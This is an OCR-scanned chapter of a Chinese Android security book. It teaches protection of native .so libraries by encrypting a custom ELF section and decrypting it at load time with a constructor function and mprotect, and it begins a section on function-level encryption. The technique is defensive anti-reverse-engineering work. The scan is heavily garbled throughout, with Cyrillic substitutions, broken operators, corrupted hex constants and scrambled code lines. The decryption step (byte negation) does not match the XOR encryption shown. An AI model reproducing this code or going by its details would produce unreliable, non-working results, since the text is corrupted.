用 这 个 属性 实现 的 阔 数 存在 两 个 section， 在 动态 链接 器 构造 了 进程 映像 ， 并 执行 了 重 定 位 以 后 ， 每 个 共享 的 目标 都 获得 执 
行 某 尝 初始 化 代码 的 机 会 。 这 些 初 始 化 阔 数 的 家 调用 顺序 是 不 一 定 的 ， 不 过 所 有 共享 目标 ， 初 始 化 都 会 在 可 执行 文件 得 到 控制 之 
前 发 生 。 类 似 地 ， 共 享 目标 也 包 合 终止 消 数 ， 这 些 消 数 在 进程 完成 终止 动作 序列 时 ， 通 过 atexit () 机 制 执 行 。 动 态 链 接 器 对 终 
止 函数 的 调用 顺序 是 不 确定 的 。 共 享 目标 通过 动态 结构 中 的 DT_INIT 和 DT_FINI 条 目 指定 初始 化 /终止 函数 。 通 常 这 些 代 码 放 
在 .init 和 .fini 节 区 中 。 这 个 知识 点 很 重要 ， 后 面 在 进行 动态 调试 so 的 时 候 ， 还 会 用 到 这 个 知识 点 ， 所 以 一 定 要 理解 。 这 里 找到 了 
解密 的 时 机 ， 目 己 定义 一 个 解密 阔 数 ， 然 后 用 上 面 的 这 个 属性 声明 融 可 以 了 。 


14.1.2 ”实现 方案 


编写 一 个 简单 的 native 人 代码， 需要 做 两 件 事 : 


- 将 核心 的 native 函数 定义 在 自己 的 一 个 section 中 ， 这 里 会 用 到 这 个 属性 : attribute ( (section (“.mytext ) ) ) ;其 


中 .mytext 是 定义 的 section。 


. 需要 编写 解密 函数 ， 用 属性 : attribute ( (constructor) ) ; 声明 。 
这 样 一 个 native 程 序 包 含 两 个 重要 的 遂 数 ,使 用 ndk 编 译 成 so 文件 。 
编写 加 密 程序 ， 在 加 密 程序 中 需要 做 的 是 : 


. 通过 解析 so 文件 ， 找 到 .mytext 段 的 起 始 地 址 和 大 小 ， 思 路 是 : 找到 所 有 的 section， 然 后 获取 它 的 name 字 段 ， 再 结合 Stting 


Section, i& Jj 3X, $].mytext F Ft c 


` 
9 


· AX S]. mytextPc Ж SEAT IE, UR REM xC #F P 


14.1.3 ”代码 实现 


前 面 介绍 了 原理 和 实现 方案 ， 下 面 束 开始 编写 对 应 的 代码 吧 ，。 


1.native 程 序 


先 来 看 看 大 致 代 码 逻 辑 : 
jstring getString(JNIEnv*) _ attribute  ((section (".mytext"))); 
jstring getString(JNIEnv* епу) { 

return (*env)-»NewStringUTF(env, "Native method return!"); 
id" 
void init getString() | attribute  ((constructor)); 


unsigned long getLibAdar(); 


JNIEXPORT jstring JNICALL 
Java com example shelldemo MainActivity getString( JNIEnv* env, 
jobject thiz ) 
{ 
#1Е defined( arm. ) 
#1f defined( ARM ARCH. 7A. ) 
#1f defined( ARM NEON ) 
define ABI "armeabi-v7a/NEON" 


#else 
#define ABI "armeabi-v7a" 

tendif 
telse 

#define ABI "armeabi" 
tendif 
#elif defined( i386 9) 

tdefine ABI "x86" 
#elif defined( mips 9) 

#define ABI "mips" 
telse 

tdefine ABI "unknown" 
tendif 


return getString(env); 


下 面 来 分 析 一 下 代码 : 
1) 定义 目 己 的 段 : 
jstring getString(JNIEnv*) _ attribute__((section (".mytext"))); 


jstring getString(JNIEnv* епу) { 
return (*env)-»NewStringUTF(env, "Native method return!"); 


bi 


其 中 getString 返 回 一 个 字符 串 ， 提 供给 Android 上 层 ， 然 后 将 getString 函 数 定义 在 .mytext 段 中 。 


2) 获取 so 加 载 到 内 存 中 的 起 始 地 址 : 


unsigned long getLibAddr()fí 
unsigned long ret = 0; 
char name[] = "libdemo.so"; 
char buf[4096], *temp; 
int pid; 
FILE *rbe 
pid - getpid(); 
sprintf (buf, 
Lex 
if(fp 
{ 


fopen(buf, "r"); 


== NULL) 


puts("open failed"); 

goto error; 
} 
while(fgets(buf, 


if(strstr(buf, name))t 


temp - strtok(buf, 
ret - strtoul(temp, 
break; 
} 
} 
_error: 


fclose(fp); 
return ret; 


"/proc/%šd/maps", 


sizeof (buf), 


pid); 


fp) ) ( 


"_"). 
NULL, 


16); 


读 取 设备 的 proc/<uid>/maps 中 的 内 容 ， 因 为 这 个 maps 中 是 程序 运行 的 内 存 映 像 ， 如 下 所 示 : 


гоої@сапсго: /ргос # cd 8674 

са 8674 

гоої@сапсго:/ргос/8674 # cat maps|grep demo.so 
cat maps|grep demo.so 

75450000-75452000 г-хр 00000000 b3:1c 458798 
75452000-75453000 r-xp 00002000 b3:1c 458798 
75453000-75454000 r--p 00002000 b3:1c 458798 
75454000-75455000 rw-p 00003000 b3:1c 458798 
гооїёсапсго: /ргос/8674 # | 


/data/app-lib/com.example. shelldemo-2/libdemo. so 
/data/app-lib/com.example. shelldemo-2/libdemo. so 
/data/app-lib/com.example.shelldemo-2/libdemo.so 
/data/app-lib/com.example.shelldemo-2/libdemo.so 


只 有 获取 到 so 的 起 始 地 址 ， 才 能 找到 指定 的 section， 然 后 进行 解密 。 


void init getString()( 
char name[15]; 
unsigned int nblock; 
unsigned int nsize; 
unsigned long base; 
unsigned long text addar; 
unsigned int i; 
Elf32 Ehdr *ehdr; 
Elf32 Shdr *shdr; 


/ / 获取 so 的 起 始 地 址 
base = getLibAddr(); 


// 获取 指定 section 的 偏 移 值 和 size 
ehdr = (Elf32 Ehdr *)base; 
text addr = ehdr-»e shoff + base; 


nblock = ehdr-»e entry >> 16; 
nsize - ehdr-»e entry & Oxffff; 


_ android log print(ANDROID LOG INFO, "JNITag", "nblock =  Ox$x,nsize:$d", n 
block,nsize); 
_ . android log print(ANDROID LOG INFO, "JNITag", "base = 0х%х", text addr); 


printf("'nblock = $din", nblocki i 


/ / 修改 内 存 的 操作 权限 


if(mprotect((void *) (text addr / PAGE SIZE * PAGE SIZE), 


4096 * nsize, PROT READ | PROT EXEC | PROT WRITE) != 0){ 
puts("mem privilege change failed"); 
_ android log print(ANDROID LOG INFO, "JNITag", "mem privilege change failed"); 
} 
// 解密 
for(1=0;i< nblock; 1++){ 
char *addr = (char*)(text addr + i); 
*addr = -(*addr); 


if(mprotect((void *) (text addr / PAGE SIZE * PAGE SIZE), 
4096 * nsize, PROT READ | PROT EXEC) != O)( 
puts("mem privilege change failed"); 


puts("Decrypt success"); 


获取 到 so 文件 的 头 部 ， 然 后 获取 指定 section 的 偏 移 地 址 和 size: 


// 获取 so 的 起 始 地 址 

base = getLibAdar(); 

// 获取 指定 section 的 偏 移 值 和 size 
ehdr = (Е1#32 Ehdr *)base; 

text addr = ehdr-»e shoff + base; 
nblock = ehdr-»e entry >> 16; 
nsize - ehdr-»e entry & Oxffff; 


读者 可 能 会 有 困惑 ”为 什么 是 这 样 获取 侦 移 地 址 和 大 小 的 呢 ， 其 实 这 里 做 了 一 点 工作 ， 融 是 在 加 密 的 时 候 顺 便 改 写 了 so 的 


头 部 信息 ， 将 偏 移 地 址 和 大 小 值 写 到 了 头 部 中 ， 这 样 加 大 破解 难度 。 
text_addr 是 起 始 地 址 + 偏 移 值 ， 就 是 section 在 内 存 中 的 绝对 地 址 ，nsize 是 section 占 用 的 页 数 。 
然后 修改 这 个 section 的 内 存 操作 权限 : 
// 修改 内 存 的 操作 权限 
if(mprotect((void *) (text addr / PAGE SIZE * PAGE SIZE), 


4096 * nsize, PROT READ | PROT EXEC | PROT WRITE) !- 0){ 
puts ("mem privilege change failed"); 


. android log print(ANDROID LOG INFO, "JNITag", "mem privilege change failed"); 


这 里 调用 了 一 个 系统 函数 : mprotect， 其 参数 如 下 : 
. 需要 修改 内 存 的 起 始 地 址 ， 必 须 需 要 页 面 对 齐 ， 也 就 是 必须 是 页 面 PAGE_SIZE (0х1000=4096) 的 整数 倍 。 
. 需要 修改 的 大 小 ， 即 占用 的 页 数 *+PAGE_SIZE。 


权限 值 。 


最 后 读 取 内 存 中 的 section 内 容 ， 然 后 进行 解密 ， 表 将 内 存 权限 修改 回去 。 然 后 使 用 ndk 编 译 成 so 即 可 ， 这 里 用 到 了 系统 的 


打印 log 信 息 ， 所 以 需要 设置 共享 库 ， 看 一 下 编译 脚本 Android.mk: 


LOCAL_PATH := S(call my-dir) 
include S(CLEAR. VARS) 

LOCAL, MODULE := demo 
LOCAL SRC FILES :- demo.c 
LOCAL LDLIBS :- -llog 

include S(BUILD SHARED LIBRARY) 


2. 加 密 程序 


获取 到 上 面 的 so 文件 ， 下 面 融 来 看 看 如 何 进行 加 密 的 : 


public class EncodeSection { 


public static String encodeSectionName - ".mytext"; 


public static ElfType32 type 32 = new ElfType32(); 
public static void main(String[] args)( 


byte[] fileByteArys = Utils.readFile("so/libdemo.so"); 


if(fileByteArys == пи11) { 
System.out.println("read file byte failed..."); 
return; 

} 

/** 


* 先 解 析 so 文件 
然后 初始 化 AddSection 中 的 一 些 信息 
х 最 后 在 AddSection 
ai i 
parseSo(fileByteArys); 


encodeSection(fileByteArys); 
parseSo(fileByteArys); 


Utils.saveFile("so/libdemos.so", fileByteArys); 


private static void encodeSection(byte[] fileByteArvys)( 
// JK String Section É 
System.out.println(); 


int string section index = Utils.byte2Short (type_32.hdr.e_shstrndx); 
elf32 shdr shdr = type 32.shdrList.get(string section index); 

int size = Utils.byte2Int(shdr.sh size); 

int offset = Utils.byte21nt(shdr.sh offset); 


int mySectionOffset-0,mySectionSize-0; 
for(elf32. shdr temp : type 32.shdrList)(í 
int sectionNameOffset = offset4Utils.byte2Int(temp.sh name); 
if(Utils.isEqualByteAry(fileByteArys, sectionNameOffset, encodeSecti 
onName) ) { 
// 这 里 需要 读 取 section 段 然后 进行 数据 加 密 
mySectionOffset = Utils.byte21Int(temp.sh offset); 
mySectionSize = Utils.byte21nt(temp.sh size); 
byte[] sectionAry - Utils.copyBytes(fileByteArys, mySectionOffse 
t, mySectionSize); 
for(int i20;i«sectionAry.length;i-«-«)( 
sectionAry[i] = (byte)(sectionAry[i] ^ OxFF); 
J 
Utils.replaceByteAry(fileByteArys, mySectionOffset, sectionAry); 


) 


// 修改 Elf Header # #7 entry fü offset ЇЙ 

int nSize = mySectionSize/4096 + (mySectionSize$4096 == 0 ? 0 : 1); 
byte[] entry = new byte[4]; 

entry = Utils.int2Byte((mySectionSize««16) + nSize); 
Utils.replaceByteAry(fileByteArys, 24, entry); 


byte[] offsetAry = new byte[4]; 
offsetAry - Utils.int2Byte(mySectionOffset); 
Utils.replaceByteAry(fileByteArys, 32, offsetAry); 


private static void parseSo(byte[] fileByteArys)( 
/ / 读 取 头 部 内 容 
System.out.println("+++++++++++++++++++E1f Header+++++++++++++++++"); 
parseHeader(fileByteArys, 0); 
System.out.println("header:Mn"-«type 32.hdr); 


需要 解析 so 文件 的 头 部 信息 、 程 序 头 信息 、 段 头 信息 ， 如 下 所 示 : 


// 读 取 头 部 内 容 

System.out.println("+++++++++++++++++++E1£f Header+++++++++++++++++"); 
parseHeader(fileByteArys, 0); 
System.out.println("header:Nn"+type_32.hdr); 


/ / 读 取 程序 头 信息 

//System.out.println(); 

//System.out.println("+++++++++++++++++++Program Неааег+++++++++++++++++") ; 
int p header offset = Utils.byte21nt(type 32.hdr.e phoff); 
parseProgramHeaderList(fileByteArys, p header offset); 

//type 32.printPhdrList(); 


/ / 读 取 段 头 信息 

//System.out.println(); 

//System.out.println("+++++++++++++++++++Section Header++++++++++++++++++"); 
int s_header_offset = Utils.byte21nt(type 32.hdr.e shoff); 
parseSectionHeaderList(fileByteArys, s header offset); 

//type 32.printShdrList(); 


жИН ТХЕ 7-17 7, IS НА BILAZCEPÉRBUIBISBA ST MAs oL HEARNS. 


获取 这 些 信息 之 后 ， 下 面 就 来 开始 寻找 section 信 息 了 ， 只 需要 遍历 section 列 表 ， 找 到 名 字 是 .mytext 的 section 即 可 ， 然 后 
获取 偏 移 地 址 和 和 大小， 对 内 容 进行 加 密 ， 回 写 到 文件 中 。 


下 面 来 看 看 核心 方法 : 


private static void encodeSection(byte[] fileByteArys)( 
// ZM String Section K 
System.out.println(); 


int string section index = Utils.byte2Short(type 32.hdr.e shstrnaàx); 
elf32. shdr shdr = type 32.shdrList.get(string section index); 

int size - Utils.byte2Int(shdr.sh size); 

int offset = Utils.byte21nt(shdr.sh offset); 


int mySectionOffset-0,mySectionSize-0; 
for(elf32. shdr temp : type 32.shdrList)( 
int sectionNameOffset = offset«Utils.byte21Int(temp.sh name); 


if(Utils.isEqualByteAry(fileByteArys, sectionNameOffset, encodeSection 
Name) ) ( 
// 这 里 需要 读 取 section 段 然后 进行 数据 加 密 
mySectionOffset = Utils.byte2Int(temp.sh_offset); 
mySectionSize = Utils.byte2Int(temp.sh_size); 
byte[] sectionAry = Utils.copyBytes(fileByteArys, mySectionOffset, 


mySectionSize); 
for (int i20;i«sectionAry.length;i-«-«)í( 
sectionAry[i] = (byte)(sectionAry[i] ^ 0хЕЕ); 


} 
Utils.replaceByteAry (fileByteArys, mySectionOffset, sectionAry); 


) 


// 修改 Elf Header 中 的 entry 和 offset 值 

int mSize = mySectionSize/4096 + (mySectionSize$4096 == 0 ? 0 : 1); 
byte[] entry = new byte[4]; 

entry = Utils.int2Byte((mySectionSize<<16) + mnSize); 
Utils.replaceByteAry (fileByteArys, 24, entry); 

byte[] offsetAry = new byte[4]; 

offsetAry = Utils.int2Byte (mySectionOffset); 

Utils.replaceByteAry (fileByteArys, 32, offsetAry); 


section 中 的 sh_name 字 段 的 值 是 这 个 section 的 name 在 StringSsection 中 的 索引 值 ， 这 里 offset 就 是 StringSection 在 文件 中 
的 偏 移 值 。 当 然 需要 知道 的 一 个 知识 点 就 是 : StringSection 中 的 每 个 name 都 是 以 \0 结尾 的 ， 所 以 只 需要 判断 字符 串 到 结束 符 
束 可 以 了 ， 判 断 方法 如 下 : 


public static boolean isEqualByteAry(byte[] src, int start, String destStr)t 
ifidestStr == null) 
return false; 


} 

byte[] dest = destStr.getBytes() 

1f (src == null || dest == null) 
return false; 


, 


if(dest.length == || src.length == 0){ 
return false; 


1 Start == sSrc.lengthi( 
return false; 


) 


int len = 0; 
byte temp = srcí[start]; 
while(temp !- 0){ 

len++; 

temp = src[start+len]; 


byte[] sonAry = copyBytes(src, start, len); 
if(sonAry == null || sonAry.length == 0){ 
return false; 


if(sonAry.length !- dest.length)(í 
return false; 
} 
String sonStr = new String(sonAry); 
if(destStr.equals(sonStr))(í 
return true; 


) 


return false; 


加 密 完成 之 后 ， 需 要 做 的 是 回 写 到 so 文件 中 ， 当 然 还 需要 做 一 件 事 ， 融 是 将 加 密 的 .mytext 段 的 偶 移 值 和 pages9ize 保 仓 到 头 


部 信息 中 : 


// 修改 Elf Header 中 的 entry fü offset 1É 

int nSize = mySectionSize/4096 + (mySectionSize$4096 == 0 ? O : 1); 
byte[] entry = new byte[4]l; 

entry = Utils.int2Byte((mySectionSize««16) + nSize); 
Utils.replaceByteAry(fileByteArys, 24, entry); 


看 到 这 里 读者 可 能 会 困惑 ， 这 样 修改 了 so 的 头 部 信息 的 话 ， 在 加 载运 行 so 文件 的 时 候 不 会 报错 吗 ? 其 实 这 丈 要 看 看 Android 


底层 是 如 何 解 析 so 文 件 ， 然 后 将 so 文件 映射 到 内 存 中 ， 下 面 来 看 看 系统 是 如 何 解 析 so 文 件 的 。 


在 linker.h 源 码 中 有 一 个 重要 的 结构 体 soinfo， 下 面 列 出 一 些 字 段 : 


struct soinfo(í 
const char name[SOINFO NAME LEN]; //so 全 名 
Elf32 Phdr *phdr; //Program header 的 地 址 
int phnum; //segment 数量 
unsigned *dynamic; // 指向 .dynamic, Æ section fü segment 中 相同 的 
// 以 下 4 个 成 员 与 .hash RAX 
unsigned nbucket; 
unsigned nchain; 
unsigned *bucket; 
unsigned *chain; 
/ / 这 两 个 成 员 只 能 会 出 现在 可 执行 文件 中 
unsigned *preinit_array; 
unsigned preinit_array_count; 
call_constructors -> call_array 
unsigned *init_array; 
unsigned init array count; 
void (*init. func) (void); 
// 5 init array 类 似 ， 只 是 在 main 结束 之 后 执行 
unsigned *fini array; 
unsigned fini, array count; 
void (*fini. func) (void: 


} 
另外 ，linker.c 中 也 有 许多 地 方 可 以 佐证 。 其 本 质 还 是 linker 基 于 装载 视图 解析 的 so 文件 。 基 于 上 面 的 结论 ， 再 来 分 析 ELF 头 
的 字段 : 


 e_ident[ET_NIDENTI] 字 上 段 包含 魔 数 、 字 节 序 、 字 长 和 版 本 ， 后 面 填充 0。 对 于 安 癌 的 linker， 通 过 verify_elf_object 朋 数 检验 
魔 数 ， 判 定 是 否 为 .so 文件 。 那 么 ， 我 们 可 以 向 位 置 写 入 数据 ， 至 少 可 以 向 后 面 的 0 填充 位 置 写 入 数据 。 遗 憾 的 是 ， 我 在 fedota 14 
下 测试 ， 是 不 能 向 0 填充 位 置 写 数据 ， 链 接 器 报 非 0 填充 错误 。 


- 对 于 安利 的 linkef， 对 e_type、e_machine、e_vetsion 和 e_flags 字 段 并 不 关心 ， 是 可 以 修改 成 其 他 数据 的 〈 仅 分 析 ， 没 有 实 


测 ) 。 


. 对 于 动态 链接 库 ，e_entty 入 口 地 址 是 无 意义 的 ， 因 为 程序 被 加 载 时 ， 设 定 的 跳 转 地 址 是 动态 连接 器 的 地 址 ， 这 个 字段 是 可 
以 被 作为 数据 填充 的 。 


` SO 装载 时 ， 与 链接 视图 没有 关系 ， 即 e_shoff、e_shenhtsize、e_shhum 和 e_shsttndx 这 些 字 段 是 可 以 任意 修改 的 。 被 修改 之 
后 ， 使 用 feadelf 和 idqda 等 工具 打开 ， 会 报 各 种 错误 ， 相 信 读 者 已 经 见识 过 了 。 


. 既然 so 装载 与 装载 视图 紧 客 相关 ， 自 然 e_phoff、e_phentsize 和 e_phnum 这 些 字段 是 不 能 动 的 。 


从 上 面 可 以 知道 ，so 文 件 中 有 些 信 息 在 运行 时 是 没有 用 的 ， 有 些 东西 是 不 能 改 的 。 在 上 面 加 密 完成 之 后 ， 可 以 验证 一 下 ， 
使 用 readelf 命 令 查看 一 下 ， 如 图 14-2 所 示 。 


1@1-РС /cygdrive^/d 
$ readelf -S libdemo_java.so 


有 22 "pk, JAB328 0х2474 开始 : 


` š 
[Nr] Name 
[ 0] <no-name> 


[ 11 <по-пате> 
HL 


Туре 


fiddr Off Size ES Fly Lk Inf Al 


LOUSER*5c58b6fc b867a72c b93f42f'7 fffffecd 810150283 NSIOGTxxxxxxxop 2164371720 2214637744 В 
reade lf; at. section B: sh link value of 21643717280 is larger than the number of sections 


NULL 


reade lf: icc. section 1: sh link value 


[ 2] <по-пате> 
reade lf: aec. 
[ 31 《no-name> 


reade 1f: ikt, section 


І 41 <по-пате> 


reade 1f : gx. section 


І 5] <no-name> 
P. 


reade lf : gx. section 


[ 61 <no-name> 
reade lf; i. 
І 7] <по-пате> 


reade 1f . 警告 section 


І 81 <no-name> 


reade lf: a. section 


[ 91 <по-пате> 
+Ҥ+ 


reade 1f: gx section 


[18] <no-name> 


ag. section 


XKno-name > 
<по-папе > 
<no-name> 
<no-name> 
<no-name> 
<по-пате> 
<no-name >» 
<no-name > 
<no-name > 
<no-name > 
<no-name > 
Flags: 


section 


LOUSER+181b108 


section 2: sh_link value 


PROGBITS 
3: sh_link value 
PROGBITS 
: sh_link value 
PROGBITS 
5: sh link value 
LOUSER+b108a9 
6: sh_link ualue 
LOUSER+b1Bfae 
: sh link value 
LOOS *d2065"76 
8: sh link value 
LOOS *56c6961 
9: sh link value 
LOOS *7656c69 


18: sh link value 


NULL 
NULL 
NULL 
NULL 
NULL 
NULL 
NULL 
NULL 
NULL 
NULL 
NULL 


8400b0b0 000000 81801b2aí1 845fbØbð xOxxxxoE 28225712 
of 28225712 is larger than the number of sections 
0800000000 7fffea38 7£ffffcB 7fffffbc MSLxxxoE 21474782680 2159085739 2147478372 

of 2147478268 is larger than the number of sections 

8004af bð ?fffed40 8Ba8bB8b8 880b188a9 XMSIOGxxxxxxxxop 2147478948 2147483560 2147479216 
of 2147478948 is larger than the number of sections 

8BbiBfa8 7fffef5c 000001 SBBSafbA XxMSOGTxxxxxxxxop 2147479448 2159087528 2147479484 
of 2147479448 is larger than the number of sections 

7E£ffff'74 ?ffff6a8 000001 Ai xMlOGoocoxxxxop 2147481256 2159153323 2147481412 
of 2147481256 is larger than the number of sections 

00000001 "7ffff'7d8 7?fffff50 01 XxMSLOGTxxxxxxxxop 2147481584 2159158698 2147481768 
of 2147481584 is larger than the number of sections 

88biBfa8 7ffffec8 000001 01 Хх5СТхххххххххор 2147483344 2147483364 2147483368 
of 2147483344 is larger than the number of sections 

65722064 6e727574 ?7?02f0021 706f0072 WXSITxxxxop 795045746 1831822373 7565409 
of 795045746 is larger than the number of sections 

6462696с 2e6f6d65 6e8B86f'73 286d656d XSIxxxo 1668246626 540876907 68099" 
of 1668246626 is larger than the number of sections 

65676e61 69616628 64656c 737365 WVXSIxxxop 1919116612 544501881 1667462515 

of 1919116612 is larger than the number of sections 

00000000 000000 0000090 HAA 
0800000000 000000 000000 HA 
0800000000 000000 000000 HA 
0000000000 000000 000000 HA 
0800000000 000000 000000 вө 
0800000000 000000 000000 
0000000000 000000 000000 HA 
0800000000 000000 000000 
0800000000 000000 000000 
0000009000 000000 0D00009 
8080000000 000000 AHAHAHA 


8 2164336191 
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W €urite?, ñ 《alloc>。X Cexecute), M merge), S <strings)> 

I <info», L Clink order), G Cgroup’. T 《TITLS>。E K<exclude)>, x 《unknowny> 

О Cextra OS processing required? o <05 specific), p (processor specific?) 
reade lf. 错误 ， no .donamic section in the dynamic segment 


iBi-PC /cygdrive/d 


图 14-2 ”查看 so 文件 内 容 


从 上 面 的 内 容 可 以 看 到 ，so 文 件 内 容 已 经 显示 错乱 了 ， 加 密 成 功 。 再 用 IDA 碍 看 一 下 ， 如 图 14-3 和 图 14-4 所 示 。 


P Please wart... De J 


Loading file into the database. 


图 14-3 IDA 打 开 so 文 件 〈 一 ) 


Op Please wait... | =< || 


Loading file into the database. 


1 File contains meaningless/illegal section declarations, using program sections 


图 14-4 IDA 打 开 so 文 件 (—) 


会 有 错误 提示 ， 但 是 点 击 OK， 还 是 成 功 打开 了 so 文件 ， 使 用 ctrl+s 查 看 section 信 息 的 时 候 ， 如 图 14-5 所 示 。 


| [аЬ] Choose segment to jump = — — BESS 


Base Type Class 


00000000 0000262C A. mempage publi CODE 
mempage public 
para public 
para public 


Line 1 of 4 
914-5 ”查看 加 客 之 后 的 section 信 息 


也 没有 看 到 section 信 息 ， 可 以 看 一 下 没有 加 密 前 的 效果 ， 如 图 14-6 所 示 。 


м 一 pamm 
Rees VPE. - == ooo BEC 
ыыы». — Qa Pa _ _ мә p 


dword [ lic CODE 


.ARM.extab 
rodata 
fint, array 
|nit, array 


Ue "S Z0 ZU ZO ZO = Z0 m0 Z0 mm 
eessessssssE 


图 14-6 so 加 密 之 前 的 section 信 息 
既然 加 密 成 功 了 ， 那 么 下 面 验证 一 下 能 人 否 运行 成 功 。 
3.Android 测 试 demo 
在 获取 加 密 之 后 的 so 文件 后 ， 用 Android 工 程 测试 一 下 : 
package com.example.shelldemo; 
import android.app.Activity; 


import android.os.Bundle; 
import android.view.Menu; 


import android.view.Menultem; 
import android.widget.TextView; 


public class MainActivity extends Activity { 


private TextView tv; 
private native String getString(); 


statici 
System.loadLibrary ("demo"); 
} 


QOverride 


protected void onCreate(Bundle savedInstanceState) 


super.onCreate(savedInstanceState); 
setContentView(R.layout.activity main); 


tv = (TextView) findaViewById(R.id.tv); 
tv.setText(getString()); 


运行 结果 如 图 14-7 所 示 。 


Native method return! 


914-7 运行 效果 


提示 : 案例 下 载 地 址 为 http://download.csdn.net/detail/jiangwei0910410003/9288051 


14.1.4 总 结 


1) 从 so 文件 头 读 取 section 偏 移 shoff、shnum 和 shstrtab。 


2) 读 取 shstrtab 中 的 字符 串 ， 存 放 在 str 空 间 中 。 

3) 从 shoff 位 置 开 始 读 取 section header， 存 放 在 shdr 中 。 

4) 通过 shdr->sh_name 在 str 字 符 串 中 索引 ， 与 .mytext 进 行 字 符 串 比较 ， 如 果 不 匹 配 ， 继 续 读 取 。 

5) 通过 shdr->sh_offset 和 shdr->sh size 字段 ， 将 .mytext 内 容 读 取 并 保存 在 content 中 。 

6) 为 了 便于 理解 ， 不 使 用 复杂 的 加 密 算法 。 这 里 ， 只 将 content 的 所 有 内 容 取 反 ， 即 *content=~ (*content) 。 
7) 将 content 内 容 写 回 so 文件 中 。 


8) 为 了 验证 第 二 节 中 关于 section 字 段 可 以 任意 修改 的 结论 ， 这 里 ， 将 shdr->addr 写 入 ELF 头 e shoff， 将 shdr->sh size 和 
addr 所 在 内 存 块 写 入 e_entry 中 ， 即 ehdr.e_entry= (length<<16) +nsize。 当 然 ， 这 样 同 时 也 简化 了 解密 流程 ， 还 有 一 个 好 
处 是 : 如 果 将 so 文件 头 修正 放 回 去 ， 程 序 是 不 能 运行 的 。 


解密 时 ， 需 要 保证 解密 为数 人 在 so 加 载 时 被 调用 ， 那 国 数 声明 为 : init getString attribute ( (constructor) ) 。 (也 可 
以 使 用 c+ + 构造 器 实现 ， 其 本 质 也 是 用 attribute 实 现 的 。 ) 


解密 流程 : 
1) 动态 链接 器 通过 call array 调 用 init getString。 

2) Init getstring 和 首先 调用 getLibAddr 方 法 ， 得 到 so 文件 在 内 存 中 的 起 始 地 址 。 

3) 读 取 前 52 字 节 ， 即 ELF 涉 。 通 过 e_shoff 获 得 .mytext 内 存 加 载 地 址 ，ehdr.e_entry 获 取 .mytext 大 小 和 所 在 内 存 块 。 
4) 修改 .mytext 所 在 内 存 块 的 读 写 权限 。 

5) 将 [e shoff, e shoff+size] 内 存 区 域 数据 解密 ， 即 取 反 操作 : *content=~ (*content) , 


6) 修改 回 内 存 区 域 的 读 写 权限 。 


这 里 是 对 代码 段 的 数据 进行 解密 ， 需 要 写 权 限 。 如 果 对 数据 段 的 数据 解密 ， 是 不 需要 更改 权限 而 直接 操作 的 。 


142 ”基于 对 so 中 的 国 数 加 密实 现 so 加 固 


上 一 节 介绍 了 对 so 中 指定 的 section 进 行 加 密 来 实现 对 so 加 国 方案 。 延 续 之 前 的 内 容 来 介绍 一 下 如 何 对 函数 进行 加 密 来 实现 
加 ° 


14.21 技术 原理 


本 节 内 容 和 上 一 节 有 很 多 类 似 的 地 万， 这 里 丈 不 做 太 多 的 解释 了 。 和 上 一 节 内 容 唯一 的 不 同 点 束 是 如 何 找到 指定 的 立 数 的 偏 
移 地 址 和 大 小 。 


那么 先 来 了 解 一 下 so 中 函数 的 表现 形式 : 在 so 文件 中 ， 每 个 函数 的 结构 摘 述 是 存放 人 在 .dynsym 段 中 的 。 每 个 六 数 的 名 称 保 仔 
在 .dynstr 段 中 的 ， 类 似 于 之 前 说 过 的 每 个 section 的 名 称 都 保 仔 在 .shstrtab 段 中 ， 所 以 在 上 一 节 中 找到 指定 section 的 时 候 ， 融 是 


通过 每 个 section 的 sh_name 字 上 段 到 .shstrtab 中 寻找 名 字 即 可 ， 而 且 知 道 .shstrtab 这 个 section 在 头 文件 中 是 有 一 个 index 的 ,就 


是 在 所 有 段 列 表 中 的 索引 值 ， 所 以 很 好 定位 .shstrtab。 


但 是 在 本 广内 容 中 可 能 遇 到 一 个 问题 ， 


[ 11 .dunsyum DYNSYH 00000114 000114 0004c0Ü 18 А 2 1 4 
Г 21 .dynstr STRIAB 090009544 000544 @@05а86 0@ А A Ө 1 
[ 31 .hash HASH @0000b?c 000b?c 000244 04 я 1 Ө 4 
Г 41 .rel.dun REL @0000dc0 000dc0 000050 098 А 1 Өе 4 
Г 51 .rel.plt REL @0000e10 000e10 B0006a8 98 А 1 6 4 
[ 61 .plt PROGBITS 0@0000eb8 000е58 000110 HBO AXZ а A 4 
[ 71 .text PROGBITS 00000#с8 000fcS 901848 00 AX а е 4 
[ 81 .ARM.extab PROGBITS 00002840 8002848 0800048 BA п а е 4 


BUE НЕТКЕН AAEREN Т, КЕЛУУ: 


可 能 有 的 人 意识 到 一 个 方法 ， 就 是 可 以 通过 section 的 type 来 获取 .dynsym 和 .dynstr。 看 到 上 图 中 .dynsym 类 型 是 : 
DYNSYM, ，.dynstr 类 型 是 STRTAB， 但 是 这 种 方法 是 不 行 的 ， 因 为 这 个 type 不 是 唯一 的 ， 也 瓯 襄 不 同 的 section ，type 可 能 相 
同 ， 没 办 法 区 分 ， 比 如 .shstrtab 和 .dynstr 的 type 都 是 STRTAB. 其 实 从 这 里 就 知道 这 两 个 段 的 区 别 了 : .shstrtab 值 存储 段 的 名 
称 ，.dynstr 是 存储 so 中 的 所 有 符号 名 称 。 


那么 该 怎么 办 呢 ?” 这 时 候 再 去 看 一 下 so 文件 格式 说 明 (参见 第 4 草 ) 。 看 到 有 一 个 .hash 段 ， 在 上 图 中 也 可 以 看 到 的 : 由 
Elf32_Word 对 象 组 成 的 哈 希 表 支 持 符号 表 访 问 。 下 面 的 例子 有 助 于 解释 哈 希 表 组 织 ， 如 图 14-8 所 示 。 


nbucket 


bucket [0 | 


chain|nchain-a| 


图 14-8 A35 


bucket 数 组 包含 nbucket 个 项 目 ，chain 数 组 包含 nchain 个 项 目 ， 下 标 都 是 从 0 开始 。bucket 和 chain 中 都 保 仔 符号 表率 
引 。chain 表 项 和 符号 表 存 在 对 应 。 符 号 表 项 的 数目 应 该 和 nchain 相 等 ， 所 以 符号 表 的 索引 也 可 用 来 选取 chain 表 项 。 哈 希 函 数 
能 够 接受 符号 名 并 且 返 回 一 个 可 以 用 来 计算 bucket 的 索引 。 因 此 ， 如 果 哈 希 了 水 数 针 对 某 个 名 字 返 回 了 数值 X， 则 
bucket[X%nbucket] 给 出 了 一 个 索引 y， 该 索引 可 用 于 符号 表 ， 也 可 用 于 chain 表 。 如 果 符 号 表 项 不 是 所 需要 的 ， 那 么 chain[y] 则 
